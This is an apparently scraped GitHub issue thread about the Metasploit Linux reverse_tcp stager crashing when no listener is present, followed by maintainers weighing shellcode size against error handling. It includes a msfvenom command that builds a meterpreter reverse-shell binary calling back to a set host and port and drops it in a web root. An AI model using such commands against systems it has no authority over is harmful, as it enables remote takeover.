Metasploit-framework: Linux reverse_tcp stager segfaults when it can't connect

Created on 17 Dec 2016  路  13Comments  路  Source: rapid7/metasploit-framework

If running a meterpreter with no handler on the other side it segfaults. I think this error should be handled.

To reproduce (tried on kali):

msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf -o /var/www/html/meterpreter LPORT=4444 LHOST=192.168.56.3
chmod +x /var/www/html/meterpreter
/var/www/html/meterpreter
Segmentation fault

Version:

root@kali:~# msfconsole --version
Framework Version: 4.13.6-dev
msf > version
Framework: 4.13.6-dev
Console  : 4.13.6-dev
picture FireFart

Most helpful comment

@wvu-r7 except me because I always have a listener ready :D

picture FireFart on 19 Dec 2016
😄3

All 13 comments

That's been a known issue for aaaages.

I vote that this gets fixed by _not me_.

I also think POSIX Meterpreter will go away soon.

OJ picture OJ on 19 Dec 2016

Not an issue with meterpreter, that's the Linux reverse_tcp stager not checking if it connected and receive anything before jumping into an empty buffer. Same thing happens with a staged shell.

bcook-r7 picture bcook-r7 on 19 Dec 2016

Alright thanks :) Just wanted to report it in case no one has seen it before

FireFart picture FireFart on 19 Dec 2016

Everyone has seen it. ;)

Real answer: to handle the error would add size to the shellcode. It can be done, but there are other syscalls that might fail, too. Best to have your handler set up first. :-)

wvu-r7 picture wvu-r7 on 19 Dec 2016

@wvu-r7 except me because I always have a listener ready :D

FireFart picture FireFart on 19 Dec 2016
😄3

Put your hand up if you got mad skills. :hand: Keep it up if you got mad kills. Make fist if your handler's always ready. :fist: Shout it out. What you roll? Natural twenties!

egypt picture egypt on 19 Dec 2016
😕1

In other news, I'm disappointed that there is no d20 emoji

egypt picture egypt on 19 Dec 2016

how much space would folks be willing to let the linux stager grow to support proper error handling? Segfaults do show up logs typically, so it can be worth it for stealth reasons. Windows reverse_tcp is a lot bigger so it could be a good tradeoff.

busterb picture busterb on 19 Dec 2016

@busterb it's really up to the exploits. Reliable mem corruption on Linux doesn't come up much these days, but older exploits have some pretty severe size restrictions.

For example:

modules/exploits/linux/smtp/exim_gethostbyname_bof.rb:        'Space' => 255, # the shorter the payload, the higher the probability of code execution
egypt picture egypt on 19 Dec 2016

I modified ./tools/modules/module_targets.rb to print Space as well and with a little command line magic, came up with these counts:

      1 130
      1 200
      4 220
      1 250
      1 256
      1 300
      1 466
      1 500
      3 512
      1 964
      3 1000
     23 1024
      1 1036
      1 1536
      9 2048
      1 2060
      2 4000
      2 4096
      1 5000
      1 8000
      2 8192
      5 10000
     16 20480
      1 60000
      2 65535
egypt picture egypt on 20 Dec 2016

Current reverse_tcp stager is 71 bytes and the smallest needed for an exploit is 130, so i feel like a little error handling should fit.

egypt picture egypt on 20 Dec 2016
👍1

8503 addresses x86. We should probably also look at doing the same for x64 since it's a lot more common, and maybe arm / mips too.

busterb picture busterb on 6 Jun 2017
👍1

I think this issue has been resolved.

tkmru picture tkmru on 12 Jul 2017
Was this page helpful?
0 / 5 - 0 ratings

Related issues

felipee07 picture felipee07  路  3Comments
bcoles picture bcoles  路  3Comments
adrianmihalko picture adrianmihalko  路  3Comments
XSecr3t picture XSecr3t  路  3Comments
Acidical picture Acidical  路  3Comments